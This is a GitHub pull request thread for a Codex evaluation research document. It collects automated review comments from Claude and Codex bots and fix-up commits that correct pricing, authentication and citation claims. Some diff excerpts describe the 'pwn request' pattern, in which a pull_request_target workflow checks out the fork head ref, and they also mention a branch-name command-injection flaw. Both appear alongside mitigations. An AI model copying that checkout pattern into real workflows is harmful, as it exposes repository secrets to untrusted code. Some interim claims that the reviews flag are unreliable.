docs(#274): Phase 0 Codex surface evaluation#277
Conversation
Exhaustive descriptive research on the OpenAI Codex surface in 2026-05: official integrations (Cloud, GitHub App, Action, CLI, Responses/Agents API), third-party tooling, BKMs from public case studies, capabilities mapped to the github-actions pivot requirements, and gaps requiring follow-up spikes. Retrieval-dated citations throughout. This is the Phase 0 deliverable for epic #273; the spec that consumes it lands on a separate PR after spike-driven revisions. Closes #274 Refs #273
|
Claude finished @cbeaulieu-gt's task in 2m 26s —— View job Review of incremental changesReviewing commits Todo List
SummaryThe incremental changes successfully address Codex P1/P2 findings from round 3. All four modifications improve accuracy and clarity. The Two minor documentation quality opportunities identified below. Findings🟢 Medium: Dependabot secrets citation could be more direct Location: Line 162 The citation links to "configuring access to private registries for Dependabot," which is about registry authentication rather than the general Dependabot secrets namespace. While the information about Dependabot secrets is correct, a more direct source would be the main GitHub docs on Dependabot secrets (e.g., Impact: Minor — readers can still verify the claim, but the citation is indirect. 🟢 Medium: API key auth claim lacks primary source citation Location: Line 542 (gotchas table) The row states that "official OpenAI docs describe switchable modes" and references "OpenAI CLI documentation," but no specific URL is provided for the official docs. The only cited source is the third-party blog (correctly marked Impact: Minor — the correction from "disables permanently" to "switchable modes" is likely accurate based on how CLI auth typically works, but verifiability would be improved with a primary source link. What worked well✅ Critical security correction (line 167): The revision correctly explains that ✅ Dependabot workaround (line 160): Helpful addition explaining the Dependabot secrets namespace as a solution for Dependabot PR reviews. ✅ Pricing accuracy (line 276): Removed unverified markers and priority pricing tiers, added verified specs with proper citations. ✅ Nuanced auth guidance (line 542): Changed from binary "excludes" framing to more accurate "switchable modes" explanation with practical implications. Verdict: APPROVE |
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: e5e88b1ca3
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
- Fix arithmetic in 50K-token review cost example ($0.26 -> $0.08) - Qualify Tier 1 burst-capacity claim with 500K TPM ceiling - Reconcile openai-api-key required-vs-conditional contradiction - Extend plan-coverage matrix to include Free + Go tiers Findings raised by chatgpt-codex-connector[bot] on the auto-review pass. Refs #274, #277 Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: ad4ba1ebe8
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
- Resolve duplicated Pro plan columns in tier matrix: collapse the duplicate Pro ($100/$200) columns to a single Pro column with an unverified: note that internal rate-limit tiers within Pro are not exposed as distinct plan names in the pricing docs - Recalculate burst-tier recommendation for 100+ PR waves: Tier 2 (1M TPM) throttles at 5M token burst; Tier 5 (10M TPM) is the first standard tier that covers the load without throttling; adds ingress rate-limiting as the realistic fallback when Tier 5 is not yet available - Distinguish Codex Cloud (Plus+ only) from Codex umbrella (all plans) at the §2.1 maturity line to reconcile with the Free/Go extension added in the prior fix-up commit (ad4ba1e) - Qualify event-agnostic trigger claim with forked-PR / Dependabot secrets gap: pull_request events from forks do not receive repo secrets, so OPENAI_API_KEY is undefined; documents pull_request_target and merged-base-queue as fork-friendly alternatives Findings raised by chatgpt-codex-connector[bot] on ad4ba1e review pass. Refs #274, #277
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 319f6d1158
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
P1 (correctness/safety): - Replace CODEX_API_KEY with OPENAI_API_KEY in CLI auth section (was inconsistent with rest of doc and with openai/codex-action input contract) - Add 'pwn request' safety caveat to pull_request_target recommendation, with GitHub Security Lab citation (fetched 2026-05-20) P2 (citation rigor): - Mark April-9 limit-regression multiplier (3.2x) as unverified community estimate; no primary OpenAI source confirmed the figure - Mark Business tier limit-regression claim as unverified community estimate - Mark harness engineering case study PR/team-size metrics as unverified; primary source inaccessible at write time (403); figures from search snippets - Fix gpt-5.5 pricing cell: replace 'See ChatGPT pricing page' with unverified: marker pointing at API pricing URL, not subscription page Findings raised by chatgpt-codex-connector[bot] on 319f6d1 review pass. Refs #274, #277
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 2eb00d3865
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| > **Critical safety caveat for `pull_request_target`:** `pull_request_target` runs in the base-repo context with secrets, but the default `actions/checkout` step without arguments checks out the base ref — not the PR head. If a workflow under `pull_request_target` explicitly checks out the PR head (e.g., `with: ref: ${{ github.event.pull_request.head.sha }}`), it executes potentially-malicious code from the fork with full base-repo permissions, including secrets and write tokens. This is the well-known "pwn request" attack pattern. Mitigations: | ||
| > - Do NOT check out PR head code under `pull_request_target` unless absolutely necessary; if you must, gate on `author_association` (OWNER / MEMBER / COLLABORATOR) before any step that executes PR code. | ||
| > - Prefer a queued-review pattern where a workflow under `pull_request_target` only posts a review comment based on the diff text, not by executing PR code. | ||
| > - For `openai/codex-action` specifically: the action reads the diff via API (not via checked-out PR code), so it can run under `pull_request_target` safely provided no other step in the same job checks out fork code with `ref: ${{ github.event.pull_request.head.sha }}`. |
There was a problem hiding this comment.
Correct pull_request_target safety note about diff source
The sentence claiming openai/codex-action "reads the diff via API" is incorrect for the action itself and can produce false-safe workflow guidance. openai/codex-action runs codex exec on the checked-out workspace/prompt; it does not automatically fetch PR diffs from GitHub. In pull_request_target workflows that avoid checking out PR head, this can lead to reviewing only base-branch content (or missing PR context entirely), so teams may think they are safely reviewing untrusted forks while actually getting incomplete/invalid review coverage.
Useful? React with 👍 / 👎.
| |--------|-------------| | ||
| | `final-message` | Raw text output from `codex exec` | | ||
|
|
||
| **Supported event triggers.** Event-agnostic: any GitHub Actions event that allows `actions/checkout` before the step will work (`pull_request`, `push`, `workflow_run`, `issue_comment`, `workflow_dispatch`, `schedule`, etc.), **with one critical exception:** `pull_request` events from forked repositories (and Dependabot-authored PRs, which GitHub treats as fork-equivalent) do not receive repository secrets — `OPENAI_API_KEY` will be undefined and the action will fail authentication. For fork-friendly review automation, use `pull_request_target` (which runs in the base-repo context with secrets available) or queue fork reviews via a separate workflow triggered against the merged base. The Codex GitHub App integration (§2.2), by contrast, runs cloud-side under OpenAI's own identity and does not have this constraint. |
There was a problem hiding this comment.
Qualify Dependabot secret behavior in auth failure claim
This line overstates Dependabot behavior by saying OPENAI_API_KEY will be undefined and auth will fail on Dependabot PRs. GitHub treats Dependabot like a fork for permission hardening, but workflows can still receive Dependabot secrets (not normal Actions secrets), so runs do not necessarily fail if the key is configured there. As written, this can cause maintainers to disable Dependabot-triggered reviews unnecessarily instead of wiring the correct secret type.
Useful? React with 👍 / 👎.
| | Model ID | Context Window | Max Output | Input $/1M | Cached $/1M | Output $/1M | Notes | | ||
| |----------|---------------|------------|-----------|------------|------------|-------| | ||
| | `gpt-5-codex` | 400,000 tokens | 128,000 tokens | $1.25 | $0.125 | $10.00 | Responses API only; optimized for agentic coding | | ||
| | `gpt-5.3-codex` | `unverified:` | `unverified:` | $1.75 (std) / $3.50 (priority) | $0.175 / $0.35 | $14.00 / $28.00 | Standard and Priority processing tiers | |
There was a problem hiding this comment.
Use published GPT-5.3-Codex specs in the pricing matrix
The gpt-5.3-codex row marks context/max output as unverified and adds "priority" prices, but the official model page already publishes concrete values (400k context, 128k max output, and standard token pricing). I checked developers.openai.com/api/docs/models/gpt-5.3-codex, and this mismatch can materially skew cost/throughput planning by presenting unsupported or stale pricing assumptions as part of the core model comparison.
Useful? React with 👍 / 👎.
| | April 9 limit model change | Limits shifted from message-count to reasoning-time measurement. `unverified — community estimate:` budgets burn up to 3.2× faster per minute on Business tier; primary OpenAI documentation confirming the multiplier was not located. Iterative CI workflows are disproportionately affected. | [community.openai.com/t/understanding-the-new-codex-limit-system-after-the-april-9-update/1378768](https://community.openai.com/t/understanding-the-new-codex-limit-system-after-the-april-9-update/1378768) (fetched 2026-05-20) | | ||
| | Business tier limit regression | `unverified — community estimate:` Business tier Codex limits regressed significantly in the April 9 update; community reports of users canceling due to "unmanageable" usage. No primary OpenAI changelog or blog post confirming the specific regression magnitude was located. | Same source as above. | | ||
| | Azure DevOps inline comment anchoring | `changeTrackingId` mapping is fragile; inline comments may fail silently. Must be validated per project before relying on in a required branch policy. | [developers.openai.com/cookbook/examples/codex/build_code_review_with_codex_sdk](https://developers.openai.com/cookbook/examples/codex/build_code_review_with_codex_sdk) (fetched 2026-05-20) | | ||
| | API key mode excludes cloud features | Switching to API key (required for CI) disables Codex Cloud, GitHub App integration, Slack integration, and cloud-feature model rollout priority. | [blog.laozhang.ai/en/posts/codex-api-key-vs-subscription](https://blog.laozhang.ai/en/posts/codex-api-key-vs-subscription) (fetched 2026-05-20) | |
There was a problem hiding this comment.
Remove unsupported claim that API-key mode disables cloud features
This row presents a strong product limitation as fact (API key mode disables Codex Cloud/GitHub/Slack features) but cites only a third-party blog, while official OpenAI docs describe API-key and ChatGPT-plan usage as separate auth modes users can switch between (for example via codex logout and re-auth). Framing this as a hard disable can mislead platform decisions by suggesting teams must choose one surface permanently instead of running CI with API keys while still using cloud features interactively.
Useful? React with 👍 / 👎.
P1 (correctness): - Correct false claim that openai/codex-action reads diff via API (it actually runs codex exec on the checked-out workspace; flagged by Codex's review of my round-3 fix — real bug I introduced) P2 (factual nuance): - Qualify Dependabot secret behavior — Dependabot secrets namespace exists and CAN provide OPENAI_API_KEY to Dependabot PRs - Replace gpt-5.3-codex 'unverified' markers with published specs (400k context, 128k max output) per official model page - Soften 'API-key mode disables cloud features' claim — auth modes are switchable per-session, not one-way exclusive Findings raised by chatgpt-codex-connector[bot] on 2eb00d3 review pass. Refs #274, #277
There was a problem hiding this comment.
💡 Codex Review
Here are some automated review suggestions for this pull request.
Reviewed commit: 9cce871020
ℹ️ About Codex in GitHub
Your team has set up Codex to review pull requests in this repo. Reviews are triggered when you
- Open a pull request for review
- Mark a draft as ready
- Comment "@codex review".
If Codex has suggestions, it will comment; otherwise it will react with 👍.
Codex can also answer questions or update the PR. Try commenting "@codex address that feedback".
| Community estimate: average ~$100–200/developer/month for full interactive use. CI-specific cost will be lower but depends heavily on diff size and review frequency. | ||
| Source: [developers.openai.com/codex/pricing](https://developers.openai.com/codex/pricing) (fetched 2026-05-20). |
There was a problem hiding this comment.
Cite the source for the monthly cost estimate
This line gives a concrete budgeting figure (~$100–200/developer/month) but the cited source is the OpenAI Codex pricing page, which does not provide that community estimate. Because this document is used for planning CI cost assumptions, an unsupported number can be mistaken for official guidance; either attach the actual community source and mark it clearly as unverified, or remove the estimate.
Useful? React with 👍 / 👎.
|
|
||
| **GitHub App integration (cloud product).** Posts reviews as `@codex`. The exact GitHub app installation identity (display name, username suffix) is `unverified:` from official docs. Community observations suggest it displays as "Codex (OpenAI)" or similar but this is not confirmed from a primary source. | ||
|
|
||
| **Security note.** The December 2025 command-injection vulnerability (fully remediated February 5, 2026) allowed GitHub OAuth token theft via malicious branch names. The remediation involved stronger shell command protections, improved input validation, and reduced scope and lifetime of GitHub tokens in Codex containers. Teams should ensure Codex CLI is at a version post-remediation (any version current as of February 2026 or later). |
There was a problem hiding this comment.
Correct the remediation date for the command-injection issue
This sentence says the vulnerability was “fully remediated February 5, 2026,” but the cited disclosure timeline lists the technical fixes on January 22 and January 30 and describes February 5 as classification/disclosure permission. Using the wrong date can skew upgrade/compliance timelines for teams treating this document as a security reference.
Useful? React with 👍 / 👎.
| **Authentication.** Requires `OPENAI_API_KEY` stored as a GitHub secret. Also supports Azure OpenAI via `responses-api-endpoint`. No subscription-based auth for the Action — API key is the only supported path. This is consistent with OpenAI's guidance: "Use an API key. CI, SDKs, app backends, and headless jobs need explicit platform credentials." | ||
| Source: [blog.laozhang.ai/en/posts/codex-api-key-vs-subscription](https://blog.laozhang.ai/en/posts/codex-api-key-vs-subscription) (fetched 2026-05-20). |
There was a problem hiding this comment.
Replace third-party citation for claimed OpenAI guidance
The text presents a quoted “OpenAI guidance” statement but cites a third-party blog rather than an OpenAI source. Since this section drives authentication decisions for CI, attributing vendor guidance to a non-authoritative source can lead to incorrect policy assumptions; cite an official OpenAI doc for this claim or label it as third-party interpretation.
Useful? React with 👍 / 👎.
|
|
||
| 7. **Context window for `gpt-5.3-codex`.** The model docs page for `gpt-5-codex` was confirmed (400K tokens), but `gpt-5.3-codex` context window is unverified. Spike: check [developers.openai.com/api/docs/models/gpt-5.3-codex](https://developers.openai.com/api/docs/models/gpt-5.3-codex). | ||
|
|
||
| 8. **Enterprise access token support for `openai/codex-action`.** Enterprise Codex access tokens are documented for `codex exec` in non-interactive workflows. Whether they can be used as the `openai-api-key` input in `openai/codex-action@v1.8`, or whether a standard API key is strictly required, is not confirmed. Spike: check the Action's `action.yml` comments for the `openai-api-key` input description, and test with an enterprise access token if available. |
There was a problem hiding this comment.
Reconcile unresolved enterprise-token support with auth claims
This open question says it is not confirmed whether Enterprise access tokens work in openai/codex-action’s openai-api-key input, but earlier sections present the action’s authentication path as settled guidance. Leaving this unresolved while giving definitive auth direction creates contradictory integration advice and can cause teams to prematurely rule out a supported credential type; either verify and document behavior or downgrade earlier claims to explicitly unverified.
Useful? React with 👍 / 👎.
…de phase (#278) * docs: codex-pivot spec rev 2 — dual-surface architecture (App + Action) Rev 2 incorporates spike #275 findings and the project-reviewer feedback on the conceptual v1. Architectural change: pr-review retires entirely (handled by the Codex GitHub App under subscription, zero in-repo YAML); the four write-side workflows migrate to openai/codex-action with API billing; the verb router collapses entirely since the App handles @codex review / @codex address feedback natively. Adds a mandatory shadow-mode phase with written kill criteria between App enablement and Claude pr-review retirement. Quality gate becomes a thin workflow filtered on the Codex bot's review state, escaping the severity-regex trap from #271. Refs #273, #275, #277 * docs: address project-reviewer findings on spec v2 (3 BLOCKING + 4 CONCERN + 2 NIT) BLOCKING: - examples/** and docs/consumer-onboarding.md DO exist on main (false negative in planner's verification step); add to touches, correct false claim, expand sub-issue #J's scope to cover them. - Shadow-mode duration logic rewritten: 7 days AND >=7 PRs binding floor; >=30 PRs is advisory, not blocking -- closes the deadline trap. - codex-gate.yml YAML draft hardened: empty-SHA guard + description field + workflow-level statuses:write permission + filter to chatgpt-codex-connector[bot]. CONCERN: - openai/codex-action @v1 pinning policy rescoped (precondition was unsatisfiable). - AGENTS.md sub-issue #A gains concrete acceptance test. - New sub-issue #O gates synchronize-event verification before Claude retirement. NIT: - S6 GHCR deletion sequencing note added. - S9 verb-router-retirement atomicity note added. Refs #273, #278 (this PR), #275 (spike findings unchanged). * docs: address Claude pr-review findings on spec v2 (#278) MAJOR: - Shadow mode duration logic clarified (7d AND 7 PRs binding; 14d max; 30 PRs aspirational) - #M sequencing contradiction resolved — 30d GHCR clock gated on #M completion, not v3 release Medium: - #O sub-issue gains explicit timing (run during #A/#B, before shadow window) Nits: - Empty-SHA error message includes recovery hint - Redundant if-condition retained with explanatory comment - §8 observation methodology specifies structured PR-by-PR logging schema - #J acceptance test method specifies throwaway consumer-test repo - BLOCKING-#4 verification step now shows the git ls-tree command + 2026-05-20 date Findings from claude-action-runner[bot] review of e062774 → 07a08f0. Refs #273, #278 Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com> * docs: complete Option-B propagation for #M audit timing (#278) The fix-up in 640e20a applied Option B to §9 row 12 (conditional 30-day clock) but left two references with Option-A "before-release" framing: #M's body and §13 Q3. This commit propagates Option B to both — #M runs post-release in parallel with #L; the GHCR-deletion clock is gated on #M completion; §13 Q3 marked resolved. Refs #273, #278 --------- Co-authored-by: Claude Auto-Fix <claude-autofix@users.noreply.github.com> Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
Summary
Lands the Phase 0 Codex research deliverable produced for issue #274 (under epic #273). Single-file addition under
docs/superpowers/research/.What's in it
docs/superpowers/research/2026-05-20-codex-evaluation.md— exhaustive descriptive evaluation of the OpenAI Codex surface (Cloud, GitHub App,openai/codex-action, CLI, Responses/Agents API) with retrieval-dated citations. No recommendations; the spec atdocs/superpowers/specs/2026-05-20-codex-pivot.md(separate PR) consumes it.Why it lands separately from the spec
The spec is being revised on a follow-up branch to incorporate spike #275 findings (Codex App works on org-owned repos under subscription; context-aware reading verified). Research doc is unchanged by the spike, so it lands first to provide a durable reference for the revised spec.
Closes
Closes #274 (Phase 0 research deliverable)
Refs #273 (epic)
🤖 Generated by Claude Code on behalf of @cbeaulieu-gt